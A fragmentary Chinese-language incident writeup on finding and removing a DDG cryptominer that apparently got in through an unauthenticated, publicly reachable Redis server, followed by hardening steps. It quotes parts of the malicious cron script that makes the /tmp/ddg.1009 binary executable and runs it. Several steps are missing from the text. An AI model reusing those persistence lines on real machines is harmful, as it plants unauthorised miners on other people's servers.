1、起因:
[root@58 ~]# crontab -e
②、lastb:檢視暴力破解的記錄,發現并沒有異常
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
if [ ! -f "/tmp/ddg.1009" ]; then
fi
chmod +x /tmp/ddg.1009 && /tmp/ddg.1009<code>`</code>
④、ps axu:檢視異常程序
[root@58 ~]# ll /var/spool/cron/crontabs
total 4
-rw-r--r-- 1 root root 62 jun 19 09:35 root
[root@58 ~]# rm -rf /var/spool/cron/crontabs
[root@58 ~]# ll /tmp/ddg.1009
-rwxr-xr-x 1 root root 8890464 jun 18 10:09 /tmp/ddg.1009
[root@58 ~]#
[root@58 ~]# chmod 444 /tmp/ddg.1009
[root@58 ~]# ll /tmp/wntkyg.noaes
-rwxr-xr-x 1 root root 1365824 jun 18 10:12 /tmp/wntkyg.noaes
[root@58 ~]# chmod 444 /tmp/wntkyg.noaes
[root@58 ~]# kill -9 13715
[root@58 ~]# kill -9 13796<code>`</code>
⑥、#修改root登陸
3、入侵思考:
①、伺服器的iptable是隻開了ssh的web的端口,且ssh使用密鑰登陸,且沒有發現嘗試登陸的異常;
②、檢視web的日志,沒有發現異常通路,應該是某個軟體的問題?
③、最後确定是redis無驗證挖礦(搜尋了linux ddg.1009),阿裡雲的安全組是允許0.0.0.0的通路的
④、阿裡雲這個0.0.0.0,巨坑啊,應該是某個賤人從其他阿裡雲的機器登陸到redis的,即【阿裡雲的安全組有0.0.0.0的,是可以通路其他不屬于自己的機器】
4、安全調整:
①、伺服器加上iptables的限制,隻允許再用的ip通路
②、redis改成nologin的使用者啟動
③、redis config修改成其他的名稱:【rename-command config "wyl0lft2uhr"】
④、修改redis端口
5、redis修改計劃任務相關指令: